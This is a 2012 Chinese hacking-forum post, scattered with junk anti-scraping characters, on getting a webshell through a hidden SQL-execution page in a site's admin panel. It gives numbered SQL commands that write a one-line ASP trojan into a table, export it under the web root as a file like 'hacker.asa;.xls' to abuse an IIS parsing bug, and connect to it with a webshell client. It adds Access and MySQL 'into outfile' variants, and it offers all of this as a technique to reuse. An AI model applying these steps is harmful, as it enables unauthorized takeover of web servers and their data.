好不容易进了后台,发现啥上传啊。备份啊多木有。" l4 U0 C8 B B9 y2 H) ^5 \
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
$ M6 G+ n) x, M文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,9 q. T* P' d3 ?0 D' ^; v
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
3 [/ B( k3 J, o, ^- y; v1.create table cmd (a varchar(50))
$ N0 u* t& n2 S/ O; `. K# t: e2.insert into cmd (a) values (‘‘)8 p; r. \ ?; R( ?2 x- P k
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
' Y1 e6 |3 G6 G- `1 n, \(把表cmd的内容导出为物理路径的一个EXCEL文件)6 p( K4 P# h' y. ~' O! H
4.drop table cmd6 V9 h. d) Y. ] y1 Z. V
利用IIS的BUG成功拿到了WEBSHELL。) y/ c' c/ a+ z; U3 O
8 A+ [8 H' \3 o0 w& M直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
* i& x9 s8 A$ R# \2 L- u5 z! [- P$ i# l7 J( x
SQL语句意思解释:
; M& P8 I1 ^- _2 ?- i 第一句# Z- j9 o' e" @$ n6 P- @1 T. p M
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
+ g/ ]- a& i( _$ J( h- V+ F j" X" G; m h0 ]/ E% y% O
第二句7 Q; h3 K+ S" ]) s! H# p( v
在表cmd的a字段插入一句话木马
% w# G" `; A7 B9 ^. l* v 第三句3 ~4 y. d# f1 l% y: `6 c8 Z
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件$ b* g6 v7 y, P' s' k/ T; F5 e
- e3 O4 T0 g4 @* x8 X/ P2 y/ U 第四句
$ M& C3 D# @) |7 C, c7 A% z, Y 删除建立的cmd表& S3 Q6 G+ `6 O2 m/ e
/ ^- @: V/ N" A0 ^6 Y2 | 以下内容为测试:. {4 a# H0 O9 J' c* \. L/ _
Access利用后台SQL执行命令功能导出WebShell:- {4 r3 k( V+ v i7 t! W' a' C2 O
这个更简单:
% p' P" m( ~+ W [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
3 _" t' ^. u5 d8 H, M- E" J8 y' J9 A 或者
: u0 D4 P0 G& A5 d: f0 q [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
# C# E0 u* n* Y, x* C K
1 @# E4 i# k/ o4 \4 R% \ 后台有执行SQL语句功能(vote为已知表段)
) w+ r, J3 j3 G 希望对大家有所帮助拿shell的又一个思路3 P" h& T# r3 _! h. s
|
发表于 2012-9-13 17:53:58
收藏
支持
反对